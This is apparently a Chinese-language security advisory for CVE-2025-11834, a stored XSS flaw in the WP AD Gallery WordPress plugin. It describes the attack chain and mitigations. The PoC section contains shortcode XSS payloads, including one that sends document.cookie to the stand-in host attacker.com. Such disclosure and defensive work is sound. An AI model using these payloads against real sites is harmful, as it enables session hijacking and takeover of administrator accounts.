CVE-2025-11834：WP AD Gallery插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-11834

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress WP AD Gallery Plugin

漏洞概述

CVE-2025-11834是WordPress WP AD Gallery插件中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞由Wordfence安全团队的安全研究员发现，披露日期为2025年10月22日，CVSS评分为6.4，属于中危级别。

WP AD Gallery是一款用于WordPress网站的广告画廊展示插件，允许用户在文章和页面中通过短代码（shortcode）嵌入和管理广告画廊内容。该插件在所有1.3及以下版本中均存在安全缺陷，具体位于ad-gallery短代码的'startindex'参数处理逻辑中。由于插件开发者在处理用户输入时未进行充分的输入净化（input sanitization）和输出转义（output escaping），导致恶意脚本可以被持久化存储到服务器端。

该漏洞的危害在于，具有Contributor（投稿者）级别及以上权限的认证攻击者可以通过在文章或页面内容中插入精心构造的恶意短代码参数，将任意JavaScript脚本注入到网站页面中。当其他用户（包括管理员）访问包含恶意代码的页面时，注入的脚本将在受害者浏览器中自动执行，可能导致会话劫持、权限提升、恶意重定向、敏感信息窃取等一系列安全风险。由于漏洞影响范围为所有版本且涉及WordPress生态中广泛使用的插件，潜在威胁面较大。

技术细节

该漏洞的技术根源在于WP AD Gallery插件短代码处理函数中对'startindex'参数的处理逻辑存在缺陷。具体来说，在shortcode/shortcode.php文件的第177行附近，插件直接将用户通过短代码传入的'startindex'参数值输出到HTML页面中，未调用WordPress提供的安全函数（如esc_attr()、esc_html()或wp_kses()等）进行适当的转义和过滤。

攻击者可以利用此缺陷构造包含恶意JavaScript代码的短代码，例如：[ad-gallery startindex='" onmouseover="alert(document.cookie)"']。当该短代码被保存到WordPress数据库后，每次有用户访问包含此短代码的页面时，恶意脚本都会在用户浏览器上下文中执行。

由于WordPress默认允许Contributor级别用户创建草稿和提交文章进行审核，而许多网站允许投稿者提交内容，因此该漏洞的利用门槛较低。攻击场景包括：攻击者注册为投稿者账户，提交包含恶意短代码的文章，等待管理员审核通过后即可对管理员实施攻击，实现权限提升或获取网站完全控制权。漏洞的CVSS向量为AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N，表明通过网络可利用、攻击复杂度低、需要低权限认证、无需用户交互，且具有作用域变更（Scope Changed）特性。

攻击链分析

STEP 1

步骤1：获取低权限账户

攻击者通过注册或利用其他方式获取目标WordPress网站的Contributor（投稿者）级别或以上权限账户。

STEP 2

步骤2：构造恶意短代码

攻击者构造包含恶意JavaScript代码的ad-gallery短代码，利用未转义的startindex参数注入XSS payload。

STEP 3

步骤3：提交恶意内容

攻击者将包含恶意短代码的文章提交至WordPress数据库，恶意脚本被持久化存储。

STEP 4

步骤4：等待受害者访问

管理员或其他用户访问包含恶意短代码的页面时，浏览器解析并执行注入的JavaScript代码。

STEP 5

步骤5：执行恶意操作

恶意脚本在受害者浏览器上下文中执行，可窃取会话Cookie、进行权限提升、重定向到钓鱼页面或植入后门，最终可能导致网站完全失陷。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2025-11834: Stored XSS in WP AD Gallery Plugin
Vulnerable Parameter: startindex
Affected Versions: <= 1.3
Required Privilege: Contributor or above
-->

<!-- Step 1: Login as a Contributor-level user -->
<!-- Step 2: Create a new post with the following shortcode content -->

[ad-gallery startindex='1" onerror="alert(\'XSS-PoC-CVE-2025-11834\')" style="display:none']

<!-- Alternative PoC for cookie stealing (for educational purposes only) -->
[ad-gallery startindex='1" onerror="var i=new Image();i.src=\'http://attacker.com/steal?c=\'+document.cookie;"']

<!-- Step 3: Submit the post for review -->
<!-- Step 4: When an admin reviews/publishes the post and visits the page, -->
<!--         the malicious JavaScript will execute in their browser context -->

影响范围

WP AD Gallery Plugin <= 1.3

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）暂时停用WP AD Gallery插件以消除攻击面；2）如需继续使用，应限制投稿者及以上权限用户的注册和文章发布功能；3）在Web服务器层面部署内容安全策略（CSP）头部，限制内联脚本执行；4）使用安全插件配置规则阻止包含可疑事件处理器（如onerror、onmouseover等）的短代码提交；5）对所有管理员账户强制启用双因素认证；6）定期审查已发布的内容，排查是否存在异常的ad-gallery短代码使用记录。